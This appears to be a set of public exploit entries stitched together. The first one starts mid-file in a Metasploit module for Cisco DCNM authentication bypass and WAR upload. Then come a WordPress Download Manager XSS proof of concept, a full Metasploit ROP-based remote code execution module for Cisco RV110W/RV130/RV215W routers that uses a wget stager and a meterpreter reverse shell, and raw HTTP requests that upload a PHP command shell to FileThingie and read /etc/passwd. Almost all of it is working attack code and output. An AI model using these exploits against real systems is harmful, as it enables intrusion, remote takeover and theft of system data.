'DefaultOptions' => { 'WfsDelay' => 10 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 26 2019' )) register_options( [ Opt::RPORT(443), OptBool.new('SSL', [true, 'Connect with TLS', true]), OptString.new('TARGETURI', [true, "Default server path", '/']), OptString.new('USERNAME', [true, "Username for auth (required only for 11.0(1) and above", 'admin']), OptString.new('PASSWORD', [true, "Password for auth (required only for 11.0(1) and above", 'admin']), ]) end def check # at the moment this is the best way to detect # check if pmreport and fileUpload servlets return a 500 error with no params res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'), 'vars_get' => { 'token' => rand_text_alpha(5..20) }, 'method' => 'GET' ) if res && res.code == 500 res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm', 'fileUpload'), 'method' => 'GET', ) if res && res.code == 500 return CheckCode::Detected end end CheckCode::Unknown end def target_select if target != targets[0] return target else res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm', 'fmrest', 'about','version'), 'method' => 'GET' ) if res && res.code == 200 if res.body.include?('version":"11.1(1)') print_good("#{peer} - Detected DCNM 11.1(1)") print_status("#{peer} - No authentication required, ready to exploit!") return targets[1] elsif res.body.include?('version":"11.0(1)') print_good("#{peer} - Detected DCNM 11.0(1)") print_status("#{peer} - Note that 11.0(1) requires valid authentication credentials to exploit") return targets[2] elsif res.body.include?('version":"10.4(2)') print_good("#{peer} - Detected DCNM 10.4(2)") print_status("#{peer} - No authentication required, ready to exploit!") return targets[3] else print_error("#{peer} - Failed to detect target version.") print_error("Please contact module author or add the target yourself and submit a PR to the Metasploit project!") print_error(res.body) print_status("#{peer} - We will proceed assuming the version is below 10.4(2) and vulnerable to auth bypass") return targets[3] end end fail_with(Failure::NoTarget, "#{peer} - Failed to determine target") end end def auth_v11 res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm/'), 'method' => 'GET', 'vars_get' => { 'userName' => datastore['USERNAME'], 'password' => datastore['PASSWORD'] }, ) if res && res.code == 200 # get the JSESSIONID cookie if res.get_cookies res.get_cookies.split(';').each do |cok| if cok.include?("JSESSIONID") return cok end end end end end def auth_v10 # step 1: get a JSESSIONID cookie and the server Date header res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm/'), 'method' => 'GET' ) # step 2: convert the Date header and create the auth hash if res && res.headers['Date'] jsession = res.get_cookies.split(';')[0] date = Time.httpdate(res.headers['Date']) server_date = date.strftime("%s").to_i * 1000 print_good("#{peer} - Got sysTime value #{server_date.to_s}") # auth hash format: # username + sessionId + sysTime + POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF session_id = rand(1000..50000).to_s md5 = Digest::MD5.digest 'admin' + session_id + server_date.to_s + "POsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" md5_str = Base64.strict_encode64(md5) # step 3: authenticate our cookie as admin # token format: sessionId.sysTime.md5_str.username res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm', 'pmreport'), 'cookie' => jsession, 'vars_get' => { 'token' => "#{session_id}.#{server_date.to_s}.#{md5_str}.admin" }, 'method' => 'GET' ) if res && res.code == 500 return jsession end end end # use CVE-2019-1622 to fetch the logs unauthenticated, and get the WAR upload path from jboss*.log def get_war_path res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm', 'log', 'fmlogs.zip'), 'method' => 'GET' ) if res && res.code == 200 tmp = Tempfile.new # we have to drop this into a file first # else we will get a Zip::GPFBit3Error if we use an InputStream File.binwrite(tmp, res.body) Zip::File.open(tmp) do |zis| zis.each do |entry| if entry.name =~ /jboss[0-9]*\.log/ fdata = zis.read(entry) if fdata[/Started FileSystemDeploymentService for directory ([\w\/\\\-\.:]*)/] tmp.close tmp.unlink return $1.strip end end end end end end def exploit target = target_select if target == targets[2] jsession = auth_v11 elsif target == targets[3] jsession = auth_v10 end # targets[1] DCNM 11.1(1) doesn't need auth! if jsession.nil? && target != targets[1] fail_with(Failure::NoAccess, "#{peer} - Failed to authenticate JSESSIONID cookie") elsif target != targets[1] print_good("#{peer} - Successfully authenticated our JSESSIONID cookie") end war_path = get_war_path if war_path.nil? or war_path.empty? fail_with(Failure::Unknown, "#{peer} - Failed to get WAR path from logs") else print_good("#{peer} - Obtain WAR path from logs: #{war_path}") end # Generate our payload... and upload it app_base = rand_text_alphanumeric(6..16) war_payload = payload.encoded_war({ :app_name => app_base }).to_s fname = app_base + '.war' post_data = Rex::MIME::Message.new post_data.add_part(fname, nil, nil, content_disposition = "form-data; name=\"fname\"") post_data.add_part(war_path, nil, nil, content_disposition = "form-data; name=\"uploadDir\"") post_data.add_part(war_payload, "application/octet-stream", 'binary', "form-data; name=\"#{rand_text_alpha(5..20)}\"; filename=\"#{rand_text_alpha(6..10)}\"") data = post_data.to_s print_status("#{peer} - Uploading payload...") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'fm', 'fileUpload'), 'method' => 'POST', 'data' => data, 'cookie' => jsession, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" ) if res && res.code == 200 && res.body[/#{fname}/] print_good("#{peer} - WAR uploaded, waiting a few seconds for deployment...") sleep 10 print_status("#{peer} - Executing payload...") send_request_cgi( 'uri' => normalize_uri(target_uri.path, app_base), 'method' => 'GET' ) else fail_with(Failure::Unknown, "#{peer} - Failed to upload WAR file") end end end

* Exploit Title: WordPress Download Manager Cross-site Scripting * Discovery Date: 2019-04-13 * Exploit Author: ThuraMoeMyint * Author Link: https://twitter.com/mgthuramoemyint * Vendor Homepage: https://www.wpdownloadmanager.com * Software Link: https://wordpress.org/plugins/download-manager * Version: 2.9.93 * Category: WebApps, WordPress CVE:CVE-2019-15889 Description -- In the pro features of the WordPress download manager plugin, there is a Category Short-code feature witch can use to sort categories with order by a function which will be used as ?orderby=title,publish_date . By adding parameter "> and add any XSS payload , the xss payload will execute. To reproduce, 1.Go to the link where we can find ?orderby 2.Add parameters >” and give simple payload like <script>alert(1)</script> 3.The payload will execute. -- PoC -- <div class="btn-group btn-group-sm pull-right"><button type="button" class="btn btn-primary" disabled="disabled">Order &nbsp;</button><a class="btn btn-primary" href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a class="btn btn-primary" href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div> -- Demo -- https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc -- Another reflected cross-site scripting via advance search https://server/wpdmpro/advanced-search/ https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## # linux/armle/meterpreter/bind_tcp -> segfault # linux/armle/meterpreter/reverse_tcp -> segfault # linux/armle/meterpreter_reverse_http -> works # linux/armle/meterpreter_reverse_https -> works # linux/armle/meterpreter_reverse_tcp -> works # linux/armle/shell/bind_tcp -> segfault # linux/armle/shell/reverse_tcp -> segfault # linux/armle/shell_bind_tcp -> segfault # linux/armle/shell_reverse_tcp -> segfault # class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Deprecated moved_from 'exploit/linux/http/cisco_rv130_rmi_rce' def initialize(info = {}) super(update_info(info, 'Name' => 'Cisco RV110W/RV130(W)/RV215W Routers Management Interface Remote Command Execution', 'Description' => %q{ A vulnerability in the web-based management interface of the Cisco RV110W Wireless-N VPN Firewall, Cisco RV130W Wireless-N Multifunction VPN Router, and Cisco RV215W Wireless-N VPN Router could allow an unauthenticated, remote attacker to execute arbitrary code on an affected device. The vulnerability is due to improper validation of user-supplied data in the web-based management interface. An attacker could exploit this vulnerability by sending malicious HTTP requests to a targeted device. A successful exploit could allow the attacker to execute arbitrary code on the underlying operating system of the affected device as a high-privilege user. RV110W Wireless-N VPN Firewall versions prior to 1.2.2.1 are affected. RV130W Wireless-N Multifunction VPN Router versions prior to 1.0.3.45 are affected. RV215W Wireless-N VPN Router versions prior to 1.3.1.1 are affected. Note: successful exploitation may not result in a session, and as such, on_new_session will never repair the HTTP server, leading to a denial-of-service condition. }, 'Author' => [ 'Yu Zhang', # Initial discovery (GeekPwn conference) 'Haoliang Lu', # Initial discovery (GeekPwn conference) 'T. Shiomitsu', # Initial discovery (Pen Test Partners) 'Quentin Kaiser <[email protected]>' # Vulnerability analysis & exploit dev ], 'License' => MSF_LICENSE, 'Platform' => %w[linux], 'Arch' => [ARCH_ARMLE, ARCH_MIPSLE], 'SessionTypes' => %w[meterpreter], 'CmdStagerFlavor' => %w{ wget }, 'Privileged' => true, # BusyBox 'References' => [ ['CVE', '2019-1663'], ['BID', '107185'], ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190227-rmi-cmd-ex'], ['URL', 'https://www.pentestpartners.com/security-blog/cisco-rv130-its-2019-but-yet-strcpy/'] ], 'DefaultOptions' => { 'WfsDelay' => 10, 'SSL' => true, 'RPORT' => 443, 'CMDSTAGER::FLAVOR' => 'wget', 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', }, 'Targets' => [ [ 'Cisco RV110W 1.1.0.9', { 'offset' => 69, 'libc_base_addr' => 0x2af06000, 'libcrypto_base_addr' => 0x2ac01000, 'system_offset' => 0x00050d40, 'got_offset' => 0x0009d560, # gadget 1 is in /usr/lib/libcrypto.so 'gadget1' => 0x00167c8c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; 'Arch' => ARCH_MIPSLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', } } ], [ 'Cisco RV110W 1.2.0.9', { 'offset' => 69, 'libc_base_addr' => 0x2af08000, 'libcrypto_base_addr' => 0x2ac03000, 'system_offset' => 0x0004c7e0, 'got_offset' => 0x00098db0, # gadget 1 is in /usr/lib/libcrypto.so 'gadget1' => 0x00167c4c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; 'Arch' => ARCH_MIPSLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', } } ], [ 'Cisco RV110W 1.2.0.10', { 'offset' => 69, 'libc_base_addr' => 0x2af09000, 'libcrypto_base_addr' => 0x2ac04000, 'system_offset' => 0x0004c7e0, 'got_offset' => 0x00098db0, # gadget 1 is in /usr/lib/libcrypto.so 'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; 'Arch' => ARCH_MIPSLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', } } ], [ 'Cisco RV110W 1.2.1.4', { 'offset' => 69, 'libc_base_addr' => 0x2af54000, 'libcrypto_base_addr' => 0x2ac4f000, 'system_offset' => 0x0004c7e0, 'got_offset' => 0x00098db0, # gadget 1 is in /usr/lib/libcrypto.so 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; 'Arch' => ARCH_MIPSLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', } } ], [ 'Cisco RV110W 1.2.1.7', { 'offset' => 69, 'libc_base_addr' => 0x2af98000, 'libcrypto_base_addr' => 0x2ac4f000, 'system_offset' => 0x0004c7e0, 'got_offset' => 0x00098db0, # gadget 1 is in /usr/lib/libcrypto.so 'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; 'Arch' => ARCH_MIPSLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', } } ], [ 'Cisco RV130/RV130W < 1.0.3.45', { 'offset' => 446, 'libc_base_addr' => 0x357fb000, 'system_offset' => 0x0004d144, 'gadget1' => 0x00020e79, # pop {r2, r6, pc}; 'gadget2' => 0x00041308, # mov r0, sp; blx r2; 'Arch' => ARCH_ARMLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp', } }, ], [ 'Cisco RV215W 1.1.0.5', { 'offset' => 69, 'libc_base_addr' => 0x2af59000, 'libcrypto_base_addr' => 0x2ac54000, 'system_offset' => 0x0004c7e0, 'got_offset' => 0x00098db0, # gadget 1 is in /usr/lib/libcrypto.so 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; 'Arch' => ARCH_MIPSLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', } } ], [ 'Cisco RV215W 1.1.0.6', { 'offset' => 69, 'libc_base_addr' => 0x2af59000, 'libcrypto_base_addr' => 0x2ac54000, 'system_offset' => 0x0004c7e0, 'got_offset' => 0x00098db0, # gadget 1 is in /usr/lib/libcrypto.so 'gadget1' => 0x00151fbc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; 'Arch' => ARCH_MIPSLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', } } ], [ 'Cisco RV215W 1.2.0.14', { 'offset' => 69, 'libc_base_addr' => 0x2af5f000, 'libcrypto_base_addr' => 0x2ac5a001, 'system_offset' => 0x0004c7e0, 'got_offset' => 0x00098db0, # gadget 1 is in /usr/lib/libcrypto.so 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; 'Arch' => ARCH_MIPSLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', } } ], [ 'Cisco RV215W 1.2.0.15', { 'offset' => 69, 'libc_base_addr' => 0x2af5f000, 'libcrypto_base_addr' => 0x2ac5a000, 'system_offset' => 0x0004c7e0, 'got_offset' => 0x00098db0, # gadget 1 is in /usr/lib/libcrypto.so 'gadget1' => 0x0005059c, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; 'Arch' => ARCH_MIPSLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', } } ], [ 'Cisco RV215W 1.3.0.7', { 'offset' => 77, 'libc_base_addr' => 0x2afeb000, 'libcrypto_base_addr' => 0x2aca5000, 'system_offset' => 0x0004c7e0, 'got_offset' => 0x000a0530, # gadget 1 is in /usr/lib/libcrypto.so 'gadget1' => 0x00057bec, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; 'Arch' => ARCH_MIPSLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', } } ], [ 'Cisco RV215W 1.3.0.8', { 'offset' => 77, 'libc_base_addr' => 0x2afee000, 'libcrypto_base_addr' => 0x2aca5000, 'system_offset' => 0x0004c7e0, 'got_offset' => 0x000a0530, # gadget 1 is in /usr/lib/libcrypto.so 'gadget1' => 0x0003e7dc, # addiu $s0, $sp, 0x20; move $t9, $s4; jalr $t9; move $a0, $s0; 'Arch' => ARCH_MIPSLE, 'DefaultOptions' => { 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp', } } ], ], 'DisclosureDate' => 'Feb 27 2019', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [ CRASH_SERVICE_DOWN, ], }, )) end def p(lib, offset) [(lib + offset).to_s(16)].pack('H*').reverse end def prepare_shellcode(cmd) case target # RV110W 1.1.0.9, 1.2.0.9, 1.2.0.10, 1.2.1.4, 1.2.1.7 # RV215W 1.1.0.5, 1.1.0.6, 1.2.0.14, 1.2.0.15, 1.3.0.7, 1.3.0.8 when targets[0], targets[1], targets[2], targets[3], targets[4], targets[6], targets[7], targets[8], targets[9], targets[10], targets[11] shellcode = rand_text_alpha(target['offset']) + # filler rand_text_alpha(4) + # $s0 rand_text_alpha(4) + # $s1 rand_text_alpha(4) + # $s2 rand_text_alpha(4) + # $s3 p(target['libc_base_addr'], target['system_offset']) + # $s4 rand_text_alpha(4) + # $s5 rand_text_alpha(4) + # $s6 rand_text_alpha(4) + # $s7 rand_text_alpha(4) + # $s8 p(target['libcrypto_base_addr'], target['gadget1']) + # $ra p(target['libc_base_addr'], target['got_offset']) + rand_text_alpha(28) + cmd shellcode when targets[5] # RV130/RV130W shellcode = rand_text_alpha(target['offset']) + # filler p(target['libc_base_addr'], target['gadget1']) + p(target['libc_base_addr'], target['system_offset']) + # r2 rand_text_alpha(4) + # r6 p(target['libc_base_addr'], target['gadget2']) + # pc cmd shellcode end end def send_request(buffer) begin send_request_cgi({ 'uri' => '/login.cgi', 'method' => 'POST', 'vars_post' => { "submit_button": "login", "submit_type": "", "gui_action": "", "wait_time": 0, "change_action": "", "enc": 1, "user": rand_text_alpha_lower(5), "pwd": buffer, "sel_lang": "EN" } }) rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the router") end end def check # We fingerprint devices using SHA1 hash of a web resource accessible to unauthenticated users. # We use lang_pack/EN.js because it's the one file that changes the most between versions. # Note that it's not a smoking gun given that some branches keep the exact same files in /www # (see RV110 branch 1.2.1.x/1.2.2.x, RV130 > 1.0.3.22, RV215 1.2.0.x/1.3.x) fingerprints = { "69d906ddd59eb6755a7b9c4f46ea11cdaa47c706" => { "version" => "Cisco RV110W 1.1.0.9", "status" =>Exploit::CheckCode::Vulnerable }, "8d3b677d870425198f7fae94d6cfe262551aa8bd" => { "version" => "Cisco RV110W 1.2.0.9", "status" => Exploit::CheckCode::Vulnerable }, "134ee643ec877641030211193a43cc5e93c96a06" => { "version" => "Cisco RV110W 1.2.0.10", "status" => Exploit::CheckCode::Vulnerable }, "e3b2ec9d099a3e3468f8437e5247723643ff830e" => { "version" => "Cisco RV110W 1.2.1.4, 1.2.1.7, 1.2.2.1 (not vulnerable), 1.2.2.4 (not vulnerable)", "status" => Exploit::CheckCode::Unknown }, "6b7b1e8097e8dda26db27a09b8176b9c32b349b3" => { "version" => "Cisco RV130/RV130W 1.0.0.21", "status" => Exploit::CheckCode::Vulnerable }, "9b1a87b752d11c5ba97dd80d6bae415532615266" => { "version" => "Cisco RV130/RV130W 1.0.1.3", "status" => Exploit::CheckCode::Vulnerable }, "9b6399842ef69cf94409b65c4c61017c862b9d09" => { "version" => "Cisco RV130/RV130W 1.0.2.7", "status" => Exploit::CheckCode::Vulnerable }, "8680ec6df4f8937acd3505a4dd36d40cb02c2bd6" => { "version" => "Cisco RV130/RV130W 1.0.3.14, 1.0.3.16", "status" => Exploit::CheckCode::Vulnerable }, "8c8e05de96810a02344d96588c09b21c491ede2d" => { "version" => "Cisco RV130/RV130W 1.0.3.22, 1.0.3.28, 1.0.3.44, 1.0.3.45 (not vulnerable), 1.0.3.51 (not vulnerable)", "status" => Exploit::CheckCode::Unknown }, "2f29a0dfa78063d643eb17388e27d3f804ff6765" => { "version" => "Cisco RV215W 1.1.0.5", "status" => Exploit::CheckCode::Vulnerable }, "e5cc84d7c9c2d840af85d5f25cee33baffe3ca6f" => { "version" => "Cisco RV215W 1.1.0.6", "status" => Exploit::CheckCode::Vulnerable }, "7cc8fcce5949a68c31641c38255e7f6ed31ff4db" => { "version" => "Cisco RV215W 1.2.0.14 or 1.2.0.15", "status" => Exploit::CheckCode::Vulnerable }, "050d47ea944eaeadaec08945741e8e380f796741" => { "version" => "Cisco RV215W 1.3.0.7 or 1.3.0.8, 1.3.1.1 (not vulnerable), 1.3.1.4 (not vulnerable)", "status" => Exploit::CheckCode::Unknown } } uri = target_uri.path res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'lang_pack/EN.js') }) if res && res.code == 200 fingerprint = Digest::SHA1.hexdigest("#{res.body.to_s}") if fingerprints.key?(fingerprint) print_good("Successfully identified device: #{fingerprints[fingerprint]["version"]}") return fingerprints[fingerprint]["status"] else print_status("Couldn't reliably fingerprint the target.") end end Exploit::CheckCode::Unknown end def exploit print_status('Sending request') execute_cmdstager end def execute_command(cmd, opts = {}) shellcode = prepare_shellcode(cmd.to_s) send_request(shellcode) end def on_new_session(session) # Given there is no process continuation here, the httpd server will stop # functioning properly and we need to take care of proper restart # ourselves. print_status("Reloading httpd service") reload_httpd_service = "killall httpd && cd /www && httpd && httpd -S" if session.type.to_s.eql? 'meterpreter' session.core.use 'stdapi' unless session.ext.aliases.include? 'stdapi' session.sys.process.execute '/bin/sh', "-c \"#{reload_httpd_service}\"" else session.shell_command(reload_httpd_service) end ensure super end end

# Exploit Title: FileThingie 2.5.7 - Arbitrary File Upload # Author: Cakes # Discovery Date: 2019-09-03 # Vendor Homepage: www.solitude.dk/filethingie # Software Link: https://github.com/leefish/filethingie/archive/master.zip # Tested Version: 2.5.7 # Tested on OS: CentOS 7 # CVE: N/A # Intro: # Easy arbitrary file upload vulnerability allows an attacker to upload malicious .zip archives ::::: POST .zip file with cmd shell POST /filethingy/ft2.php HTTP/1.1 Host: 10.0.0.21 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester Content-Type: multipart/form-data; boundary=---------------------------3402520321248020588131184034 Content-Length: 1117 Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="localfile-1567531192592"; filename="" Content-Type: application/octet-stream -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="MAX_FILE_SIZE" 2000000 -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="localfile"; filename="cmdshell.zip" Content-Type: application/zip PK š#O $ cmdshell.phpUT ۟n]۟n]۟n]ux ³±/È(P(ÃŽHÃɉO­HMÖP‰ww ‰VOÃŽMQÂÕ´VP°·ã PKý(tÃ…& $ PK š#Oý(tÃ…& $ ¤ cmdshell.phpUT ۟n]۟n]۟n]ux PK Z € -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="act" upload -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="dir" /tester -----------------------------3402520321248020588131184034 Content-Disposition: form-data; name="submit" Upload -----------------------------3402520321248020588131184034-- :::::::::::::::::::::::::::::Unzip Malicious file POST /filethingy/ft2.php HTTP/1.1 Host: 10.0.0.21 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.21/filethingy/ft2.php?dir=/tester Content-Type: application/x-www-form-urlencoded Content-Length: 63 Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 newvalue=cmdshell.zip&file=cmdshell.zip&dir=%2Ftester&act=unzip ::::::::::::::::::::::::::::::Access your shell GET /filethingy/folders/tester/cmdshell.php?cmd=whoami HTTP/1.1 Host: 10.0.0.21 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 Cache-Control: max-age=0 ::::::::::::::::::::::::::::::Read /etc/passwd GET /filethingy/folders/tester/cmdshell.php?cmd=cat%20/etc/passwd HTTP/1.1 Host: 10.0.0.21 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: issabelSession=67ne0anmf52drmijjf1s1ju380; PHPSESSIDnERPteam=tl1e1m4eieonpgflqa1colhqs2; nERP_installation=60kne7l4f54fico5ud4tona073; 100021corebos=ktk7mnr6pspnet6n2ij582e1v7; ci_cookie=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22175c2b30943f07368eef92a9dcdd2ecb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A9%3A%2210.0.0.17%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A60.0%29+Gecko%2F20100101+Firefox%2F60.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1567451164%3B%7D9ff869bbb4f3d937de5d566b82eaf01a; PHPSESSID=jl9jcj3vfqf53ujcj332gncpe7 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 HTTP/1.1 200 OK Date: Tue, 03 Sep 2019 17:38:04 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Length: 1738 Connection: close Content-Type: text/html; charset=UTF-8 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin misdn:x:31:31:Modular ISDN:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin polkitd:x:999:998:User for polkitd:/:/sbin/nologin cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/sbin/nologin mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin saslauth:x:998:76:Saslauthd user:/run/saslauthd:/sbin/nologin mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin uucp:x:10:14:Uucp user:/var/spool/uucp:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin dhcpd:x:177:177:DHCP server:/:/sbin/nologin asterisk:x:997:994:Asterisk PBX:/var/lib/asterisk:/bin/bash spamfilter:x:1000:1000::/home/spamfilter:/bin/bash sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin avahi:x:70:70:Avahi 